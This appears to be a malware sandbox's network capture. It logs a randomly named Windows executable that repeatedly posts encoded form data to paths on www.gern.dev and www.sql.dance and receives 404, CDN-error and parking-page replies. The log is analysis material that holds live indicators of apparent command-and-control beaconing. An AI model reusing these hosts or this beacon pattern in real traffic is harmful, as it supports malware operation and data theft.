20 66 6f 75 6e 64 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 [TRUNCATED] Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>400</title></head><body><div id='main' style='display:none'><i><h2>Something error:</h2></i><p><h3>400</h3><h3><font color='red'>host not found.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: sg1-cdnb135-013</div><hr><div id='pb'></div></div><script language='javascript'>var referer = escape(document.referrer);var url = escape(document.URL);var msg = 'host%20not%20found.'; var hostname='sg1-cdnb135-013';var event_id='';document.write('<scr'+'ipt language="javascript" src="https://error.skycloud.tw/system/error?code=400"></scr' + 'ipt>');</script>... padding for ie -->... padding for ie -->... padding for ie -->... padding for ie -->... 66d573af --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49811	185.151.30.223	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:40.402579069 CET	732	OUT	POST /i0t0/ HTTP/1.1 Host: www.gern.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: max-age=0 Connection: close Origin: http://www.gern.dev Referer: http://www.gern.dev/i0t0/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 30 37 68 67 4a 6c 37 69 43 42 56 49 69 34 6e 66 4c 45 7a 41 2b 31 34 57 67 71 31 47 62 61 4f 44 4a 71 37 41 72 32 49 54 78 31 6f 78 6b 6d 61 51 6c 48 70 63 46 69 7a 70 35 76 36 59 75 56 44 4b 37 53 6f 58 4d 38 33 79 50 67 64 49 79 41 43 57 77 46 31 6b 47 71 7a 37 67 58 6b 62 53 6e 45 41 6a 54 71 37 4b 46 45 54 32 56 68 56 61 62 4b 46 53 56 49 31 37 66 56 77 34 71 57 38 56 7a 4a 37 66 32 53 5a 32 55 2b 4d 31 2b 38 52 44 6a 34 4c 50 65 58 57 72 6a 51 30 44 63 77 6a 6f 4f 6d 31 4f 6b 75 67 66 44 6a 48 6b 2b 49 69 30 50 62 46 63 38 62 31 2f 6e 71 4c 54 59 46 6d 6b 59 49 4c 47 41 3d 3d Data Ascii: ERYLmh=07hgJl7iCBVIi4nfLEzA+14Wgq1GbaODJq7Ar2ITx1oxkmaQlHpcFizp5v6YuVDK7SoXM83yPgdIyACWwF1kGqz7gXkbSnEAjTq7KFET2VhVabKFSVI17fVw4qW8VzJ7f2SZ2U+M1+8RDj4LPeXWrjQ0DcwjoOm1OkugfDjHk+Ii0PbFc8b1/nqLTYFmkYILGA==
Jan 10, 2025 19:52:41.172581911 CET	364	IN	HTTP/1.1 404 date: Fri, 10 Jan 2025 18:52:41 GMT server: Apache content-length: 196 content-type: text/html; charset=iso-8859-1 x-via: ASH1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49828	185.151.30.223	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:42.957777023 CET	752	OUT	POST /i0t0/ HTTP/1.1 Host: www.gern.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: max-age=0 Connection: close Origin: http://www.gern.dev Referer: http://www.gern.dev/i0t0/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 30 37 68 67 4a 6c 37 69 43 42 56 49 7a 70 58 66 4a 6a 66 41 72 46 34 56 35 4b 31 47 53 36 4f 48 4a 71 6e 41 72 33 39 4c 78 48 4d 78 6b 44 2b 51 6b 46 52 63 49 43 7a 70 32 50 37 7a 68 31 44 2f 37 53 31 30 4d 35 50 79 50 67 4a 49 79 46 6d 57 77 79 4a 37 48 36 7a 35 6f 33 6c 39 63 48 45 41 6a 54 71 37 4b 46 41 35 32 52 31 56 61 71 36 46 44 45 49 36 6b 76 56 78 78 4b 57 38 52 7a 4a 2f 66 32 54 30 32 52 6e 6e 31 39 55 52 44 6d 63 4c 4b 66 58 58 68 6a 51 36 63 4d 78 54 72 64 4b 6c 41 32 69 6f 62 68 2f 4d 76 4e 4d 37 34 70 57 66 4d 66 53 69 38 30 69 4a 48 2b 6b 57 74 70 74 43 64 43 32 45 6b 57 5a 61 64 53 79 33 6e 51 67 71 4e 47 39 2f 34 2f 77 3d Data Ascii: ERYLmh=07hgJl7iCBVIzpXfJjfArF4V5K1GS6OHJqnAr39LxHMxkD+QkFRcICzp2P7zh1D/7S10M5PyPgJIyFmWwyJ7H6z5o3l9cHEAjTq7KFA52R1Vaq6FDEI6kvVxxKW8RzJ/f2T02Rnn19URDmcLKfXXhjQ6cMxTrdKlA2iobh/MvNM74pWfMfSi80iJH+kWtptCdC2EkWZadSy3nQgqNG9/4/w=
Jan 10, 2025 19:52:43.737863064 CET	364	IN	HTTP/1.1 404 date: Fri, 10 Jan 2025 18:52:44 GMT server: Apache content-length: 196 content-type: text/html; charset=iso-8859-1 x-via: ASH1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49844	185.151.30.223	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:45.501924038 CET	1765	OUT	POST /i0t0/ HTTP/1.1 Host: www.gern.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1235 Cache-Control: max-age=0 Connection: close Origin: http://www.gern.dev Referer: http://www.gern.dev/i0t0/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 30 37 68 67 4a 6c 37 69 43 42 56 49 7a 70 58 66 4a 6a 66 41 72 46 34 56 35 4b 31 47 53 36 4f 48 4a 71 6e 41 72 33 39 4c 78 48 45 78 6b 51 47 51 69 6b 52 63 4a 43 7a 70 37 76 36 55 68 31 44 59 37 53 38 39 4d 35 4c 4d 50 6c 4e 49 77 6a 71 57 67 44 4a 37 4d 36 7a 35 71 33 6b 61 53 6e 46 59 6a 54 37 77 4b 45 77 35 32 52 31 56 61 70 53 46 54 6c 49 36 2f 76 56 77 34 71 57 67 56 7a 4a 58 66 32 36 42 32 51 33 52 31 4e 30 52 44 47 4d 4c 49 4e 2f 58 70 6a 51 34 66 4d 78 4c 72 64 48 69 41 32 2f 54 62 67 4c 32 76 4b 41 37 70 76 36 45 56 75 75 32 2b 48 47 65 53 2b 4d 6e 71 59 67 62 64 6a 79 39 67 45 68 55 4e 6b 62 69 6e 78 42 61 56 6e 73 35 71 66 54 61 59 6a 6e 77 64 72 72 6d 75 76 78 53 79 50 47 69 34 6b 4b 36 2b 63 53 34 48 41 30 6c 34 46 53 64 33 74 51 77 7a 6a 63 67 73 67 61 67 52 67 51 42 41 38 66 37 55 58 36 70 4e 6c 43 32 78 48 66 37 42 36 6b 69 42 71 76 71 35 57 35 49 33 6b 31 4a 2b 49 61 6d 78 76 58 53 32 70 38 6d 51 41 6f 6a 37 69 52 51 78 33 31 79 6c 73 2b 44 79 7a 75 4d 46 54 30 [TRUNCATED] Data Ascii: ERYLmh=07hgJl7iCBVIzpXfJjfArF4V5K1GS6OHJqnAr39LxHExkQGQikRcJCzp7v6Uh1DY7S89M5LMPlNIwjqWgDJ7M6z5q3kaSnFYjT7wKEw52R1VapSFTlI6/vVw4qWgVzJXf26B2Q3R1N0RDGMLIN/XpjQ4fMxLrdHiA2/TbgL2vKA7pv6EVuu2+HGeS+MnqYgbdjy9gEhUNkbinxBaVns5qfTaYjnwdrrmuvxSyPGi4kK6+cS4HA0l4FSd3tQwzjcgsgagRgQBA8f7UX6pNlC2xHf7B6kiBqvq5W5I3k1J+IamxvXS2p8mQAoj7iRQx31yls+DyzuMFT0eTNK3iWf9UTxb+rX7G1qY/xEORYyD1PGYXePYaGqeqy0HU9yk64wyBgwl2+ASDQcHx5fSr8dzwsDh++KOpVTNblxNm8jzyLz5cY4DYzE2fn+bLJHG4M+yzMWaKC96SMt0PXVUd44zQHhYCZYxOjN/zAHC2YBGQw+Fb4DP1zKdZpHlWL1PpZSOD+Nk/LFvDyoen2IuAD4qg2lWqrV151Pv6aUsSjUy8sB7XYn/RXVIOACoFMzUkQdKao5gbG9brW60fhGOOhAEPWgRnBj/rdwgcoyxHv5DDmki7ILiViQjgirZnIKGArfk52iQif61ENOPNMZ+ybRiY3A6WNMmYk4VytPyXyU7AOFA9BanI47odzv2LA/tzJO6NMFFWjnQldkgD0KnexvY8yFboU8Lo5nfpKPqcEIqEwwKy4+CNlFeI7AoWyaCp2rp+PtZvWZYf8+Bw/A/IEjs2ZGULc75F70gjcZ3d5UP2Frzqh16k0R4G08GwhkkNB9dFYHzNMHMOjrXPbGM2s1ILPBq6SnYlQouf02wFKH91VcjxIjewJLyn9XYyx22NX0BRI5iLQf7PRz78OWErD5gItxp2uc2zi64hB3QHXDDevdQ31M3hIOTI69vQkFxTQ3skKgoLiEyDRAiHrgFSjkx/Oe5tPvkrdoa7nBngm++HafFt [TRUNCATED]
Jan 10, 2025 19:52:46.289457083 CET	364	IN	HTTP/1.1 404 date: Fri, 10 Jan 2025 18:52:46 GMT server: Apache content-length: 196 content-type: text/html; charset=iso-8859-1 x-via: ASH1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49858	185.151.30.223	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:48.042443991 CET	470	OUT	GET /i0t0/?X6H8=IvQt7&ERYLmh=55JAKRHCVhRFz4rSCivB82QuzdQ/baakOPrCijpU7kQxygbYqFNZJ0DsoOfetVDx1igJEubFEiJe3C+c5zJONaTpvnJNfmhjgkKiBmVn8klxaL2GeVp9+f4= HTTP/1.1 Host: www.gern.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:52:48.825884104 CET	460	IN	HTTP/1.1 404 date: Fri, 10 Jan 2025 18:52:48 GMT content-type: text/html; charset=iso-8859-1 transfer-encoding: chunked vary: Accept-Encoding server: Apache x-origin-cache-status: MISS x-cdn-cache-status: MISS x-via: ASH1 connection: close Data Raw: 43 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49895	199.59.243.228	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:54.034864902 CET	735	OUT	POST /11n4/ HTTP/1.1 Host: www.sql.dance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: max-age=0 Connection: close Origin: http://www.sql.dance Referer: http://www.sql.dance/11n4/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 64 34 70 59 57 59 79 6d 75 6e 43 62 4d 32 35 6c 79 6f 74 2f 7a 6e 2f 76 58 4e 6d 53 4b 69 38 49 56 6a 30 78 47 7a 45 51 42 53 48 47 48 35 2b 73 48 73 6d 30 70 4d 4d 56 66 6a 6f 77 61 69 54 72 2b 6a 73 57 62 50 72 59 39 4d 2f 4a 47 61 33 48 39 76 43 30 4e 4d 6f 7a 4c 59 31 34 32 51 2f 62 4e 46 35 7a 55 51 31 44 58 68 71 6f 2b 32 31 54 32 74 2f 76 4a 33 59 6c 31 53 65 33 41 41 66 6c 50 64 64 32 48 78 77 45 51 5a 6a 73 4b 46 6a 5a 73 31 38 65 4e 73 64 4b 4e 30 64 39 63 57 61 6c 4e 5a 62 4b 51 53 55 2f 2f 4c 54 56 71 59 45 77 65 52 46 6a 63 77 4d 56 6a 68 69 48 50 50 43 64 6b 67 3d 3d Data Ascii: ERYLmh=d4pYWYymunCbM25lyot/zn/vXNmSKi8IVj0xGzEQBSHGH5+sHsm0pMMVfjowaiTr+jsWbPrY9M/JGa3H9vC0NMozLY142Q/bNF5zUQ1DXhqo+21T2t/vJ3Yl1Se3AAflPdd2HxwEQZjsKFjZs18eNsdKN0d9cWalNZbKQSU//LTVqYEweRFjcwMVjhiHPPCdkg==
Jan 10, 2025 19:52:54.489393950 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:52:54 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 0cb59817-23df-4cfb-8345-fc49f5e7bc6e cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qP+4r39ShRcj2Lss3RmPghrCdmVE4EDnwacsCD1VVFA9MRNSE1l2dki+yNAIK3rnif/Qz+C9gogxO6OnqIfWEQ== set-cookie: parking_session=0cb59817-23df-4cfb-8345-fc49f5e7bc6e; expires=Fri, 10 Jan 2025 19:07:54 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 50 2b 34 72 33 39 53 68 52 63 6a 32 4c 73 73 33 52 6d 50 67 68 72 43 64 6d 56 45 34 45 44 6e 77 61 63 73 43 44 31 56 56 46 41 39 4d 52 4e 53 45 31 6c 32 64 6b 69 2b 79 4e 41 49 4b 33 72 6e 69 66 2f 51 7a 2b 43 39 67 6f 67 78 4f 36 4f 6e 71 49 66 57 45 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qP+4r39ShRcj2Lss3RmPghrCdmVE4EDnwacsCD1VVFA9MRNSE1l2dki+yNAIK3rnif/Qz+C9gogxO6OnqIfWEQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:52:54.489437103 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGNiNTk4MTctMjNkZi00Y2ZiLTgzNDUtZmM0OWY1ZTdiYzZlIiwicGFnZV90aW1lIjoxNzM2NTM1MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49912	199.59.243.228	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:56.578552961 CET	755	OUT	POST /11n4/ HTTP/1.1 Host: www.sql.dance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: max-age=0 Connection: close Origin: http://www.sql.dance Referer: http://www.sql.dance/11n4/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 64 34 70 59 57 59 79 6d 75 6e 43 62 4e 56 78 6c 7a 4c 46 2f 78 48 2f 73 55 4e 6d 53 45 43 38 45 56 6a 49 78 47 79 78 58 43 68 7a 47 47 59 4f 73 47 70 53 30 67 63 4d 56 51 44 6f 31 48 79 53 70 2b 6a 67 65 62 4f 58 59 39 4d 72 4a 47 66 54 48 39 59 65 33 66 4d 6f 39 54 6f 31 32 34 77 2f 62 4e 46 35 7a 55 51 49 75 58 68 69 6f 35 47 6c 54 6e 2f 48 67 4b 33 59 69 68 43 65 33 4b 67 66 68 50 64 64 45 48 77 64 68 51 62 72 73 4b 41 48 5a 74 6b 38 5a 43 73 64 49 43 55 63 38 5a 6e 4c 55 4d 72 2b 62 55 30 63 6f 39 66 48 55 6d 2b 4a 71 4f 79 4d 30 66 6a 45 58 33 48 44 33 47 2b 6e 55 2f 6a 4a 38 58 63 55 51 4c 6f 4a 58 30 33 4b 4e 36 65 56 6f 32 6b 73 3d Data Ascii: ERYLmh=d4pYWYymunCbNVxlzLF/xH/sUNmSEC8EVjIxGyxXChzGGYOsGpS0gcMVQDo1HySp+jgebOXY9MrJGfTH9Ye3fMo9To124w/bNF5zUQIuXhio5GlTn/HgK3YihCe3KgfhPddEHwdhQbrsKAHZtk8ZCsdICUc8ZnLUMr+bU0co9fHUm+JqOyM0fjEX3HD3G+nU/jJ8XcUQLoJX03KN6eVo2ks=
Jan 10, 2025 19:52:57.039153099 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:52:56 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 61478b2b-32f3-4a1c-8ef0-f64625a901ab cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qP+4r39ShRcj2Lss3RmPghrCdmVE4EDnwacsCD1VVFA9MRNSE1l2dki+yNAIK3rnif/Qz+C9gogxO6OnqIfWEQ== set-cookie: parking_session=61478b2b-32f3-4a1c-8ef0-f64625a901ab; expires=Fri, 10 Jan 2025 19:07:56 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 50 2b 34 72 33 39 53 68 52 63 6a 32 4c 73 73 33 52 6d 50 67 68 72 43 64 6d 56 45 34 45 44 6e 77 61 63 73 43 44 31 56 56 46 41 39 4d 52 4e 53 45 31 6c 32 64 6b 69 2b 79 4e 41 49 4b 33 72 6e 69 66 2f 51 7a 2b 43 39 67 6f 67 78 4f 36 4f 6e 71 49 66 57 45 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qP+4r39ShRcj2Lss3RmPghrCdmVE4EDnwacsCD1VVFA9MRNSE1l2dki+yNAIK3rnif/Qz+C9gogxO6OnqIfWEQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:52:57.039179087 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjE0NzhiMmItMzJmMy00YTFjLThlZjAtZjY0NjI1YTkwMWFiIiwicGFnZV90aW1lIjoxNzM2NTM1MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
